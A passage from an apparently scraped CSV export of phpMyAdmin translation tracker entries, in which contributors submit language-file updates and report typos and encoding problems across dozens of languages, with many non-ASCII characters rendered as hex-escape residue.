Galician language update Original URL https sourceforge.net p phpmyadmin translations 716 https sourceforge.net p phpmyadmin translations 716 Original author xosecalvo","bug"
"24444","3748","Japanese translation updated HEAD).
Japanese translation updated, It is HEAD on CVS.
Original URL https sourceforge.net p phpmyadmin translations 717 https sourceforge.net p phpmyadmin translations 717 Original author elf2000","bug"
"24444","3749","danish 2.7.0.
Danish update.
Original URL https sourceforge.net p phpmyadmin translations 718 https sourceforge.net p phpmyadmin translations 718 Original author dk alleykat","bug"
"24444","3750","Hungarian translation updated.
Hungarian translation iso and utf8 files) updated.
Original URL https sourceforge.net p phpmyadmin translations 719 https sourceforge.net p phpmyadmin translations 719 Original author necronix","bug"
"24444","3751","Japanese translation updated QA 2 7 0).
Japanese translation updated, It is branch of QA 2 7 0 on CVS.
Original URL https sourceforge.net p phpmyadmin translations 720 https sourceforge.net p phpmyadmin translations 720 Original author elf2000","bug"
"24444","3752","Italian Translation Update HEAD).
Italian translation update.
Based on CVS version 2006 01 01 Original URL https sourceforge.net p phpmyadmin translations 721 https sourceforge.net p phpmyadmin translations 721 Original author rebeluca","bug"
"24444","3753","Documentation ja.html 2.7.0 pl2.
Documentation ja.html 2.7.0 pl2 Shift JIS encoded) Original URL https sourceforge.net p phpmyadmin translations 722 https sourceforge.net p phpmyadmin translations 722 Original author tcool","bug"
"24444","3754","German Formate => Tabellenformate .
Since upgrading from PMA 2.6.1 pl3 to 2.7.0 pl2, my German colleagues are bemoaning the translation Formate for the Engines tab.
Translated back to English, that s just Formats and that doesn t really convey the idea of a storage engine.
The suggestion is to change Formate to Tabellenformate, to match other existing translations of Storage Engines, and the supplied diff does this against CVS HEAD.
Original URL https sourceforge.net p phpmyadmin translations 723 https sourceforge.net p phpmyadmin translations 723 Original author ryandesign","bug"
"24444","3755","Polish update.
Polish update Original URL https sourceforge.net p phpmyadmin translations 724 https sourceforge.net p phpmyadmin translations 724 Original author ubanus","bug"
"24444","3756","Catalan update.
In Catalan language files, there were an error about the word permxc3xads permission) which plural is permisos , not permissos .
Original URL https sourceforge.net p phpmyadmin translations 725 https sourceforge.net p phpmyadmin translations 725 Original author dgimeno","bug"
"24444","3757","Japanese Translation CVS 2006 01 23 11 05 JST).
I updated Japanese translation for CVS HEAD.
Original URL https sourceforge.net p phpmyadmin translations 726 https sourceforge.net p phpmyadmin translations 726 Original author elf2000","bug"
"24444","3758","Italian Translation Update PMA 2.8.0.
Zipped file with new strings for PMA 2.8.0 Italian translation Original URL https sourceforge.net p phpmyadmin translations 727 https sourceforge.net p phpmyadmin translations 727 Original author rebeluca","bug"
"24444","3759","Updated Norwegian language file.
Updated Norwegian language file Original URL https sourceforge.net p phpmyadmin translations 728 https sourceforge.net p phpmyadmin translations 728 Original author sven erik","bug"
"24444","3760","Italian lang Update for 2.8.0.
Complete italian translation file with the last not translated string for PMA 2.8.0.
Original URL https sourceforge.net p phpmyadmin translations 729 https sourceforge.net p phpmyadmin translations 729 Original author rebeluca","bug"
"24444","3761","Belarusian translation for 2.8.0.
Belarusian translation for 2.8.0.
Cyrillic and Latin scripts.
Original URL https sourceforge.net p phpmyadmin translations 730 https sourceforge.net p phpmyadmin translations 730 Original author zedlik","bug"
"24444","3762","Typo in Italian translation.
Please fix the following typo in Italian translation files[1] strFileCouldNotBeRead = Il filenon puxc3xb2 essere letto ; with strFileCouldNotBeRead = Il file non puxc3xb2 essere letto ; Sorry for not providing patches.)
[1] phpmyadmin phpMyAdmin lang italian iso 8859 1.inc.php phpmyadmin phpMyAdmin lang italian iso 8859 15.inc.php phpmyadmin phpMyAdmin lang italian utf 8.inc.php Original URL https sourceforge.net p phpmyadmin translations 731 https sourceforge.net p phpmyadmin translations 731 Original author lucab83","bug"
"24444","3763","Catalan update for 2.8.0.
Hi folks!
There is the update for the catalan messages for 2.8.0 Best regards, Xavier Navarro Girona Spain Original URL https sourceforge.net p phpmyadmin translations 732 https sourceforge.net p phpmyadmin translations 732 Original author xavin","bug"
"24444","3764","danish 2.8.0. updated. )
Original URL https sourceforge.net p phpmyadmin translations 733 https sourceforge.net p phpmyadmin translations 733 Original author dk alleykat","bug"
"24444","3765","Japanese translation CVS 2006 02 12 JST).
I updated Japanese translation, for HEAD and RELEASE 2 8 0BETA1.
Original URL https sourceforge.net p phpmyadmin translations 734 https sourceforge.net p phpmyadmin translations 734 Original author elf2000","bug"
"24444","3766","Finnish lang update for 2.8.0.
Finnish lang update for 2.8.0.
Could you merge to cvs?
Original URL https sourceforge.net p phpmyadmin translations 735 https sourceforge.net p phpmyadmin translations 735 Original author yoneh","bug"
"24444","3767","Japanese translation updates for HEAD.
Translations below by ELF2000 have several lines undone.
I ve translated them all, though they have much to be done yet.
I ll check and fix them in the future.
This archive has three files inside.
phpMyAdmin lang japanese euc.inc.php phpMyAdmin lang japanese sjis.inc.php phpMyAdmin lang japanese utf 8.inc.php Original URL https sourceforge.net p phpmyadmin translations 736 https sourceforge.net p phpmyadmin translations 736 Original author tcool","bug"
"24444","3768","Swedish for 2.8.0.
Swedish translation for 2.8.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 737 https sourceforge.net p phpmyadmin translations 737 Original author bjornth","bug"
"24444","3769","Chinese BIG5 Update.
parts of the strings had been translated.
other will be submit as soon as possible.
Original URL https sourceforge.net p phpmyadmin translations 738 https sourceforge.net p phpmyadmin translations 738 Original author siusun","bug"
"24444","3770","Swedish for 2.8.0.
Swedish translation of new messages since last translation for 2.8.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 739 https sourceforge.net p phpmyadmin translations 739 Original author bjornth","bug"
"24444","3771","Updated Norwegian for HEAD.
Updated Norwegian languagefile for 2.8.0.
Original URL https sourceforge.net p phpmyadmin translations 740 https sourceforge.net p phpmyadmin translations 740 Original author sven erik","bug"
"24444","3772","Italian Translaslation Update for HEAD).
Italian Translaslation Update Original URL https sourceforge.net p phpmyadmin translations 741 https sourceforge.net p phpmyadmin translations 741 Original author rebeluca","bug"
"24444","3773","Spanish update for 2.8.0.2.
Spanish update for 2.8.0.2.
All the very best, Daniel Hinostroza Original URL https sourceforge.net p phpmyadmin translations 742 https sourceforge.net p phpmyadmin translations 742 Original author hinostroza","bug"
"24444","3774","Galician update.
Galician update Original URL https sourceforge.net p phpmyadmin translations 743 https sourceforge.net p phpmyadmin translations 743 Original author xosecalvo","bug"
"24444","3775","Estonian Lang update for HEAD.
Updated estonian language Original URL https sourceforge.net p phpmyadmin translations 744 https sourceforge.net p phpmyadmin translations 744 Original author uhuu","bug"
"24444","3776","small typo in german translation.
ich hoffe ich bin hier richtig, strShowStatusSlave retried transactionsDescr = Gesamtzahl seit Start des Servers) der vom Replikations Slave SQL Thread widerversuchten Transaktionen.
; recently translated muxc3x9f heissen wiederversucht Original URL https sourceforge.net p phpmyadmin translations 745 https sourceforge.net p phpmyadmin translations 745 Original author windkiel","bug"
"24444","3777","Updated Finnish lang file HEAD).
Here is the updated version of Finnish language file.
The language file is translated based on the latest file on the CVS.
Could you merge this?
Original URL https sourceforge.net p phpmyadmin translations 746 https sourceforge.net p phpmyadmin translations 746 Original author yoneh","bug"
"24444","3778","Bulgarian translation update HEAD).
Id bulgarian utf 8.inc.php,v 2.132 2006 03 23 18 05 08 lem9 Exp Based on the latest CVS version.
Cheers ) Original URL https sourceforge.net p phpmyadmin translations 747 https sourceforge.net p phpmyadmin translations 747 Original author stanprog","bug"
"24444","3779","Updated Slovak files HEAD).
added new translations doplnenxc3xbd chxc3xbdbajxc3xbaci preklad) changes in translations zmeny v doterajxc5xa1om preklade) dotaz gt; dopyt vixc4x8f.
http www.forma.sk onlines slex slexbody.asp?key=dotaz ) porovnxc3xa1vanie gt; zotriedenie lepxc5xa1xc3xad preklad Collation) moxc5xbenxc3xa9 tiexc5xbe zoraxc4x8fovanie, zoradenie view gt; pohxc4xbead odlxc3xadxc5xa1enie od nxc3xa1hxc4xbeadu preview) based on last CVS Original URL https sourceforge.net p phpmyadmin translations 748 https sourceforge.net p phpmyadmin translations 748 Original author droopytsf","bug"
"24444","3780","Galician update.
Galician update Original URL https sourceforge.net p phpmyadmin translations 749 https sourceforge.net p phpmyadmin translations 749 Original author xosecalvo","bug"
"24444","3781","dutch utf8 typo xc3x83xc2xab instead of xc3xab).
Hi, the file lang\dutch utf 8.inc.php contains some strange character combination instead of xc3xab.
Same for xc3xb6 xc3x83xc2xb6) Can somebody just change them all?
Works fine for me.
Mark Original URL https sourceforge.net p phpmyadmin translations 750 https sourceforge.net p phpmyadmin translations 750 Original author markdaems","bug"
"24444","3782","Catalan update for 2.8.1.
Hi ha un error en l accent de la paraula Ordenacixc3xb3 .
Mirant el codi font html) de la pxc3xa0gina, en el text del label estxc3xa0 ben escrit lt;label for= select collation connection gt; Ordenacixc3xb3 de la connexixc3xb3 MySQL lt; label gt; Perxc3xb2 justament a sota, en el select, l accent xc3xa9s obert i ha de ser el mateix que abans, tancat lt;select xml lang= en dir= ltr name= collation connection id= select collation connection onchange= this.form.submit ); gt; lt;option value= gt;Ordenacixc3xb2 lt; option gt; Segurament xc3xa9s un error mecanogrxc3xa0fic, perxc3xb2 fa una mica de mal a la vista xDD Grxc3xa0cies per tot!
Original URL https sourceforge.net p phpmyadmin translations 751 https sourceforge.net p phpmyadmin translations 751 Original author minterior","bug"
"24444","3783","Updated Tatarish l10n file.
please update in the libraries select lang.lib.php file too tt iso 8859 9 = gt; array tt|tatarish , tatarish iso 8859 9 , tt , Tatar amp;ccedil;a ), tt utf 8 = gt; array tt|tatarish , tatarish utf 8 , tt , Tatar amp;ccedil;a ), Original URL https sourceforge.net p phpmyadmin translations 752 https sourceforge.net p phpmyadmin translations 752 Original author al beri","bug"
"24444","3784","Slovak Update HEAD).
Added new translations.
Fixed few typos.
Based on last CVS 2006 06 21 10 29 41).
Original URL https sourceforge.net p phpmyadmin translations 753 https sourceforge.net p phpmyadmin translations 753 Original author droopytsf","bug"
"24444","3785","danish update HEAD).
danish, updated slightly improved.
Original URL https sourceforge.net p phpmyadmin translations 754 https sourceforge.net p phpmyadmin translations 754 Original author dk alleykat","bug"
"24444","3786","german english text inspite of german choosen.
on main gt; privileges gt; Add a new User Hauptseite gt; Rechte gt; Neuen Benutzer hinzufxc3xbcgen it says Neuen Benutzer hinzufxc3xbcgen Logininformationen Benutzername ....
Database for user xc2xb0 None xc2xb0 Create database with same name and grant all privileges xc2xb0 Grant all privileges on wildcard name username ) Globale Rechte Alle auswxc3xa4hlen Auswahl entfernen ) .... is that intentional ?
xc2xb0 keine xc2xb0 Datenbank mit demselben Namen und allen Rechten erzeugen xc2xb0 alle Rechte auf Datenbanken gewxc3xa4hren, die mit diesem Namen plus anfangen wxc3xa4re klarer fxc3xbcr deutschsprachige Administratoren just my 0.02 Euro ) Original URL https sourceforge.net p phpmyadmin translations 755 https sourceforge.net p phpmyadmin translations 755 Original author windkiel","bug"
"24444","3787","Catalan revision.
Hi, folks!
This is a revision of the catalan language from the lastest CVS, that corrects the 1498090 ticket and some others found.
Best regards.
Xavier Navarro Girona Spain Original URL https sourceforge.net p phpmyadmin translations 756 https sourceforge.net p phpmyadmin translations 756 Original author xavin","bug"
"24444","3788","german strUsedPhpExtensions.
Verwandte php Erweiterungen[ mysqli] klingt irgendwie komisch mit wem verwandt?
ok, beides ist richtiges Deutsch.
Mein Vorschlag Verwendete php Verbindungsart mindestens Verwendete php Erweiterungen) Original URL https sourceforge.net p phpmyadmin translations 757 https sourceforge.net p phpmyadmin translations 757 Original author windkiel","bug"
"24444","3789","Galician translation update.
New strings and revisions of older ones.
Original URL https sourceforge.net p phpmyadmin translations 758 https sourceforge.net p phpmyadmin translations 758 Original author xosecalvo","bug"
"24444","3790","About showing email address in cvs files.
I have my email address written in finnish iso 8859 1.inc and other Finnish language files.
I would like to remove it wholly from the cvs files.
How could this be performed?
Lem9, could you remove my email address from every Finnish lang files?
Also from previous versions of finnish language files.)
By using Google it is possible to get into knowledge my email address.
Spam bots are using this method to spam my email box.
Original URL https sourceforge.net p phpmyadmin translations 759 https sourceforge.net p phpmyadmin translations 759 Original author yoneh","bug"
"24444","3791","Estonian update.
Estonian update for HEAD Original URL https sourceforge.net p phpmyadmin translations 760 https sourceforge.net p phpmyadmin translations 760 Original author uhuu","bug"
"24444","3792","Russian update.
Russian translation update Original URL https sourceforge.net p phpmyadmin translations 761 https sourceforge.net p phpmyadmin translations 761 Original author gt2","bug"
"24444","3793","Polish update.
Polish update Original URL https sourceforge.net p phpmyadmin translations 762 https sourceforge.net p phpmyadmin translations 762 Original author ubanus","bug"
"24444","3794","Swedish for 2.9.0.
Swedish translation for 2.9.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 763 https sourceforge.net p phpmyadmin translations 763 Original author bjornth","bug"
"24444","3795","Italian translation update pma 2.9.0.
Italian translation update pma 2.9.0 Original URL https sourceforge.net p phpmyadmin translations 764 https sourceforge.net p phpmyadmin translations 764 Original author rebeluca","bug"
"24444","3796","Japanese update for HEAD.
Japanese updates for HEAD lang japanese sjis.inc.php lang japanese euc.inc.php lang japanese utf 8.inc.php Original URL https sourceforge.net p phpmyadmin translations 765 https sourceforge.net p phpmyadmin translations 765 Original author tcool","bug"
"24444","3797","Belarusian translation for 2.9.0.
Belarusian translation.
Original URL https sourceforge.net p phpmyadmin translations 766 https sourceforge.net p phpmyadmin translations 766 Original author zedlik","bug"
"24444","3798","Brazilian Translation Annual Update.
Hi, this is a big update, ALL strings translated Original URL https sourceforge.net p phpmyadmin translations 767 https sourceforge.net p phpmyadmin translations 767 Original author thedarkness","bug"
"24444","3799","Catalan update for 2.9.0.
Hi folks!
This is the catalan update for 2.9.0 Best regards, Xavier Navarro Girona Spain Original URL https sourceforge.net p phpmyadmin translations 768 https sourceforge.net p phpmyadmin translations 768 Original author xavin","bug"
"24444","3800","Bulgarian traslation update.
Bulgarian traslation update from the latest CVS version Original URL https sourceforge.net p phpmyadmin translations 769 https sourceforge.net p phpmyadmin translations 769 Original author stanprog","bug"
"24444","3801","Updated Norwegian translation.
Here is an updated Norwegian language file.
Original URL https sourceforge.net p phpmyadmin translations 770 https sourceforge.net p phpmyadmin translations 770 Original author sven erik","bug"
"24444","3802","Croatian translation.
Well, after some effort, I ve finaly finnished Croatian translation.
It s translated from scratch, updated with latest lng file from lang dir, so I guess it s now up to date with the latest 2.90 I ve tested it in any possible way that occured to me, proffed and spelchecked.
This is going to be my very first upload on SorceForge, and I hope there will be not too much mistakes ;) Best regards Renato Pavicic Original URL https sourceforge.net p phpmyadmin translations 771 https sourceforge.net p phpmyadmin translations 771 Original author babalui","bug"
"24444","3803","Small typo in Italian Translation.
Correction for a small typo in Italian translation Original with error) strBrowseDistinctValues = Nviga tra i valori DISTINCT ; Corrected strBrowseDistinctValues = Naviga tra i valori DISTINCT ; Original URL https sourceforge.net p phpmyadmin translations 772 https sourceforge.net p phpmyadmin translations 772 Original author rebeluca","bug"
"24444","3804","Turkish translation 3.1.1).
Hello Marc, I finished the Turkish translation.
There were lots of mistakes and missings in old lines.
I did from the begining.
I did over the latest head file and translate the one file.
But there are two files in archive which I convert to second one.
I test lots of parts and correct but I am sure there can be more.
I will do in a time during using of it.
And will I submit the updated files via this form?
Regards Original URL https sourceforge.net p phpmyadmin translations 773 https sourceforge.net p phpmyadmin translations 773 Original author bourock","bug"
"24444","3805","Updated Finnish language file.
Here s updated Finnish language file for 2.9.0 rc1.
Could you merge this?
Original URL https sourceforge.net p phpmyadmin translations 774 https sourceforge.net p phpmyadmin translations 774 Original author yoneh","bug"
"24444","3806","Bulgarian translation update.
update of the translaion based on the latest CVS version of the file Original URL https sourceforge.net p phpmyadmin translations 775 https sourceforge.net p phpmyadmin translations 775 Original author stanprog","bug"
"24444","3807","danish update.
More fixed lang quite a bit), added new vars en no danish mysql docs yet).
Original URL https sourceforge.net p phpmyadmin translations 776 https sourceforge.net p phpmyadmin translations 776 Original author dk alleykat","bug"
"24444","3808","Small typo in German translation.
For german translation it should be Benutzerprofile and not Benutzprofilen Original URL https sourceforge.net p phpmyadmin translations 777 https sourceforge.net p phpmyadmin translations 777 Original author toralf foerster","bug"
"24444","3809","typo updated Finnish lang file.
I found some typos and grammatical mistakes in the finnish lang file and here s a typo corrected version of Finnish lang file now edited based on a version in the cvs snapshot Id finnish iso 8859 1.inc.php 9408 2006 09 15 12 03 00Z lem9 ) Could you merge this?
Original URL https sourceforge.net p phpmyadmin translations 778 https sourceforge.net p phpmyadmin translations 778 Original author yoneh","bug"
"24444","3810","Small fix for Dutch Gebruikersnaam .
Hi, Here s a small fix for the three Dutch translations they spell Gebuikers naam but this should be Gebruikersnaam without space).
This messes the loginbox up a bit so it s more than a spelling fix, also a layout one ) Thijs Original URL https sourceforge.net p phpmyadmin translations 779 https sourceforge.net p phpmyadmin translations 779 Original author kink","bug"
"24444","3811","Spanish update for 2.9.1rc2.
Here is the updated tranlation for Spanish update for 2.9.1rc2.
All the very best, Dr. med.
Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 780 https sourceforge.net p phpmyadmin translations 780 Original author dhinostroza","bug"
"24444","3812","Estonian update.
Update of the translaion from the latest CVS version.
Original URL https sourceforge.net p phpmyadmin translations 781 https sourceforge.net p phpmyadmin translations 781 Original author uhuu","bug"
"24444","3813","Incorrect Japanese for cannot load MySQL extension .
Reproduction Steps 1\.
Set the browsers language setting to Japanese [ja].
2\.
Remove php mysql extension from php.ini.
3\.
Open phpMyAdmin.
Problem Error message reads xe6x89xb1xe3x81x88xe3x81xaaxe3x81x84xe6x8bxa1xe5xbcxb5xe5xadx90xe3x81xaexe3x83x95xe3x82xa1xe3x82xa4xe3x83xabxe3x81xa7xe3x81x99, lt;br gt;PHP xe3x81xaexe8xa8xadxe5xaex9axe3x82x92xe3x83x81xe3x82xa7xe3x83x83xe3x82xafxe3x81x97xe3x81xa6xe3x81x8fxe3x81xa0xe3x81x95xe3x81x84 xe3x83x89xe3x82xadxe3x83xa5xe3x83xa1xe3x83xb3xe3x83x88 Atsukaenai kakuchoshi no fairu desu, PHP no settei wo checcku shite kudasai), which translates as Unsupported file extension.
Check the PHP setting.
Expectation The correct translation of the English error Cannot load mysql extension.
Please check your PHP configuration, should be xe3x80x8cPHP xe3x81xae MySQL xe6x8bxa1xe5xbcxb5xe3x83xa2xe3x82xb8xe3x83xa5xe3x83xbcxe3x83xabxe3x81xaexe8xaaxadxe3x81xbfxe8xbexbcxe3x81xbfxe3x81xabxe5xa4xb1xe6x95x97xe3x81x97xe3x81xbexe3x81x97xe3x81x9f PHP xe3x81xaexe8xa8xadxe5xaex9axe3x82x92xe7xa2xbaxe8xaax8dxe3x81x97xe3x81xa6xe3x81x8fxe3x81xa0xe3x81x95xe3x81x84 xe3x80x8d PHP no MySQL kakuchou mojuuru no no yomikomi ni shippai shimashita.
PHP no settei wo kakunin shitekudasai) Original URL https sourceforge.net p phpmyadmin translations 782 https sourceforge.net p phpmyadmin translations 782 Original author eed3si9n","bug"
"24444","3814","Catalan update for 2.10.0.
Hi folks!
This is the zipped) catalan update for 2.10.0, from the lastest SVN.
Best regards.
Xavier Navarro Girona, Catalonia Spain.
Original URL https sourceforge.net p phpmyadmin translations 783 https sourceforge.net p phpmyadmin translations 783 Original author xavin","bug"
"24444","3815","Japanese translation updates for 2.10.
Here re Japanese translation updates for 2.10.
Attached tarball contains japanese euc.inc.php japanese sjis.inc.php japanese utf 8.inc.php Japanese lang files seem to have been broken for some time ie.
several characters not words were missing, though I don t know why), so I almost totally revamped them.
Original URL https sourceforge.net p phpmyadmin translations 784 https sourceforge.net p phpmyadmin translations 784 Original author tcool","bug"
"24444","3816","Spanish update for 2.10.0beta.
Here is the latest update for Spanish 2.10.0beta.
All the very best Dr. med.
Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 785 https sourceforge.net p phpmyadmin translations 785 Original author hinostroza","bug"
"24444","3817","Sinhala Translation.
This submission is for the phpmyadmin sinhala translation.
Original URL https sourceforge.net p phpmyadmin translations 786 https sourceforge.net p phpmyadmin translations 786 Original author malindahs","bug"
"24444","3818","Swedish for 2.10.0.
Swedish translation for 2.10.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 787 https sourceforge.net p phpmyadmin translations 787 Original author bjornth","bug"
"24444","3819","Finnish translation for 2.10.0.
Here s the Finnish translation for pma 2.10.0.
The strings to be translated have now be translated.
There are also other lingual improvements in other strings made.
Original URL https sourceforge.net p phpmyadmin translations 788 https sourceforge.net p phpmyadmin translations 788 Original author yoneh","bug"
"24444","3820","Update Brazilian Portuguese.
As always, a new update...
Original URL https sourceforge.net p phpmyadmin translations 789 https sourceforge.net p phpmyadmin translations 789 Original author thedarkness","bug"
"24444","3821","small typo.
There s a small typo in the German language files.
PMA version 2.10.0.2 wrong strNumberOfTables = Anzhal Tabellen ; should be strNumberOfTables = Anzahl Tabellen ; Original URL https sourceforge.net p phpmyadmin translations 790 https sourceforge.net p phpmyadmin translations 790 Original author thehacker","bug"
"24444","3822","danish 2.10, 2.11 SVN.
danish update based on current SVN version english Original URL https sourceforge.net p phpmyadmin translations 791 https sourceforge.net p phpmyadmin translations 791 Original author dk alleykat","bug"
"24444","3823","Fix for Dutch.
Hi, Here s a fix for a Dutch string it contained HTML which will show encoded in the output.
Original URL https sourceforge.net p phpmyadmin translations 792 https sourceforge.net p phpmyadmin translations 792 Original author kink","bug"
"24444","3824","Brazilian Portuguese Update.
Brazilian Portuguese Update 12 new translated strings added Original URL https sourceforge.net p phpmyadmin translations 793 https sourceforge.net p phpmyadmin translations 793 Original author thedarkness","bug"
"24444","3825","Galician translation update.
Galician translation update Original URL https sourceforge.net p phpmyadmin translations 794 https sourceforge.net p phpmyadmin translations 794 Original author xosecalvo","bug"
"24444","3826","Macedonian translation.
Project for translation of phpMyAdmin in Macedonian language, same as other languages listed here Original URL https sourceforge.net p phpmyadmin translations 795 https sourceforge.net p phpmyadmin translations 795 Original author dimce","bug"
"24444","3827","Brazilian update.
Brazilian update New strings translated and some corrections Original URL https sourceforge.net p phpmyadmin translations 796 https sourceforge.net p phpmyadmin translations 796 Original author thedarkness","bug"
"24444","3828","Russian translation revision.
During the last four months on forum.php myadmin.ru was coming work in revision and accomplishment of phpMyAdmin Russian translation.
Previously decentralized one was sometimes fragmentary and even ridiculous.
We tried to discuss every variable, every sentence, to combine integral, polished translation.
It was awaited by our community so long and now we can say that the Russian translation is not worse than it s English original.
In extension of this work, project php myadmin.ru would like to be the main place for the following translations into Russian of phpMyAdmin.
The point is that we can open discussions on any problem moments and hold the all translation in an integrity, not allowing a different translation of the same term or interface element.
The job was done in collaboration by Gosha Sakovich, Ivan Kirillov, Ivan Shumiloff, Victor Volkov.
Based on phpMyAdmin 2.10.2.
Original URL https sourceforge.net p phpmyadmin translations 797 https sourceforge.net p phpmyadmin translations 797 Original author hanut","bug"
"24444","3829","Swedish for 2.11.
Swedish translation for 2.11 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 798 https sourceforge.net p phpmyadmin translations 798 Original author bjornth","bug"
"24444","3830","Russian for 2.11.
Done.
Original URL https sourceforge.net p phpmyadmin translations 799 https sourceforge.net p phpmyadmin translations 799 Original author hanut","bug"
"24444","3831","Japanese for 2.11.
Japanese translation for 2.11, including japanese sjis.inc.php japanese euc.inc.php japanese utf 8.inc.php Original URL https sourceforge.net p phpmyadmin translations 800 https sourceforge.net p phpmyadmin translations 800 Original author tcool","bug"
"24444","3832","Updated Norwegian for 2.11.
Updated Norwegian for 2.11.
Original URL https sourceforge.net p phpmyadmin translations 801 https sourceforge.net p phpmyadmin translations 801 Original author sven erik","bug"
"24444","3833","Italian for 2.11.
Italian translation update.
New strings for PMA 2.11 and correction of variuos typo Original URL https sourceforge.net p phpmyadmin translations 802 https sourceforge.net p phpmyadmin translations 802 Original author rebeluca","bug"
"24444","3834","Update for spanish 2.11.
Update for spanish 2.11 All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 803 https sourceforge.net p phpmyadmin translations 803 Original author dhinostroza","bug"
"24444","3835","Catalan update for 2.11.
Hi, folks.
There is a zipped archive with the catalan update for 2.11, from the lastest SVN.
Best regards, Xavier Navarro.
Original URL https sourceforge.net p phpmyadmin translations 804 https sourceforge.net p phpmyadmin translations 804 Original author xavin","bug"
"24444","3836","Update e mail address in translators list.
Hi folks!
My e mail address has changed.
My new one is xvnavarro gmail.com Please update this in the translators list.
Best regards.
Xavier Navarro Original URL https sourceforge.net p phpmyadmin translations 805 https sourceforge.net p phpmyadmin translations 805 Original author xavin","bug"
"24444","3837","identical strings for two different ?)
messages.
strShowStatusInnodb dblwr pages writtenDescr and strShowStatusInnodb dblwr writesDescr have identical content in all message files.
When I looked up usage of those messages, first is a description for Innodb dblwr pages written and the second for Innodb dblwr writes .
Is this intentional or should these texts be addapted changed?
Brane Jovanovic translator for Serbian Original URL https sourceforge.net p phpmyadmin translations 806 https sourceforge.net p phpmyadmin translations 806 Original author branej","bug"
"24444","3838","Serbian update for 2.11.
Updated Serbian translations for 2.11, Cyrillic and Latin, UTF 8 Original URL https sourceforge.net p phpmyadmin translations 807 https sourceforge.net p phpmyadmin translations 807 Original author mikis","bug"
"24444","3839","Croatian update for 2.11.1.
Update of Croatian translation to version 2.11.1 Sorry for delay ) BR, Renato Original URL https sourceforge.net p phpmyadmin translations 808 https sourceforge.net p phpmyadmin translations 808 Original author babalui","bug"
"24444","3840","Improved Finnish language file.
Here is the Finnish language file, being improved and having new strings translated.
Original URL https sourceforge.net p phpmyadmin translations 809 https sourceforge.net p phpmyadmin translations 809 Original author yoneh","bug"
"24444","3841","Hungarian translation update.
Hi I have updated the hungarian language files.
Original URL https sourceforge.net p phpmyadmin translations 810 https sourceforge.net p phpmyadmin translations 810 Original author necronix","bug"
"24444","3842","small spelling issues and new translations.
to be more polite in german we use Ihrer in strUnsupportedCompressionDetected, strControluserFailed and Sie in strAccessDeniedCreateConfig, strAccessDeniedExplanation, strSessionStartupErrorGeneral I also translated the new pma 3.0 strings.
Original URL https sourceforge.net p phpmyadmin translations 811 https sourceforge.net p phpmyadmin translations 811 Original author windkiel","bug"
"24444","3843","Updated Norwegian translation.
Updated Norwegian translation Original URL https sourceforge.net p phpmyadmin translations 812 https sourceforge.net p phpmyadmin translations 812 Original author sven erik","bug"
"24444","3844","Incorrect russian translation of term Cardinality provided.
English word Cardinality is translated to Russian as xd0x9axd0xb0xd1x80xd0xb4xd0xb8xd0xbdxd0xb0xd0xbbxd1x8cxd0xbdxd0xbexd1x81xd1x82xd1x8c Cardinality ), or xd0x9axd0xbexd0xbbxd0xb8xd1x87xd0xb5xd1x81xd1x82xd0xb2xd0xbe xd1x83xd0xbdxd0xb8xd0xbaxd0xb0xd0xbbxd1x8cxd0xbdxd1x8bxd1x85 xd0xb7xd0xbdxd0xb0xd1x87xd0xb5xd0xbdxd0xb8xd0xb9 A number of unique values ).
But current russian translation says xd0x9axd0xbexd0xbbxd0xb8xd1x87xd0xb5xd1x81xd1x82xd0xb2xd0xbe xd0xb7xd0xbdxd0xb0xd1x87xd0xb5xd0xbdxd0xb8xd0xb9 A number of values) which confuses users, that are not familiar with MySQL.
Please correct russian translation of this term in the file russian utf 8.inc.php at line of strCardinality.
Original URL https sourceforge.net p phpmyadmin translations 813 https sourceforge.net p phpmyadmin translations 813 Original author fractalizer","bug"
"24444","3845","Japanese translation update for HEAD 2.11.5).
Here s a Japanese translation update for 2.11.5.
Cheers, tcool Kenichi Ishigaki Original URL https sourceforge.net p phpmyadmin translations 814 https sourceforge.net p phpmyadmin translations 814 Original author tcool","bug"
"24444","3846","Updated italian translation for PMA 2.11.5.
Updated italian translation for PMA 2.11.5 and correction of some typo Original URL https sourceforge.net p phpmyadmin translations 815 https sourceforge.net p phpmyadmin translations 815 Original author rebeluca","bug"
"24444","3847","Swedish for 2.11.5.
Swedish translation for 2.11.5 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 816 https sourceforge.net p phpmyadmin translations 816 Original author bjornth","bug"
"24444","3848","catalan lang files lost chars with accents.
Files catalan iso 8859 1.inc.php catalan utf 8.inc.php have lost all extended chars... For example, lines 20 strAccessDenied = Accs denegat ; 53 strAngularLinks = Enllaos angulars ; must be 20 strAccessDenied = Accxc3xa9s denegat ; 53 strAngularLinks = Enllaxc3xa7os angulars ; Original URL https sourceforge.net p phpmyadmin translations 817 https sourceforge.net p phpmyadmin translations 817 Original author macjohn","bug"
"24444","3849","Russian lang files for QA 2 11.
Thanks to FractalizeR s advices, we made some changes in Russian translation.
Original URL https sourceforge.net p phpmyadmin translations 818 https sourceforge.net p phpmyadmin translations 818 Original author hanut","bug"
"24444","3850","Spanish translation update.
Here it is.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 819 https sourceforge.net p phpmyadmin translations 819 Original author dhinostroza","bug"
"24444","3851","New Romanian translation.
The Romanian translation file, containing updated and fully reviewed strings.
From now on, the romanian letters xc5x9f, xc5xa3, xc4x83, xc3xae, xc3xa2) are included.
Original URL https sourceforge.net p phpmyadmin translations 820 https sourceforge.net p phpmyadmin translations 820 Original author sbivol","bug"
"24444","3852","Swedish utf 8 without BOM.
There is a problem with swedish utf 8.inc.php in phpMyAdmin 2.11.5.x that gives the error Warning Cannot modify header information headers already sent by ... .
This is fixed with attached file that is saved as utf 8 without BOM.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 821 https sourceforge.net p phpmyadmin translations 821 Original author bjornth","bug"
"24444","3853","Bangla Translation.
Here is the Bangla Language pack.
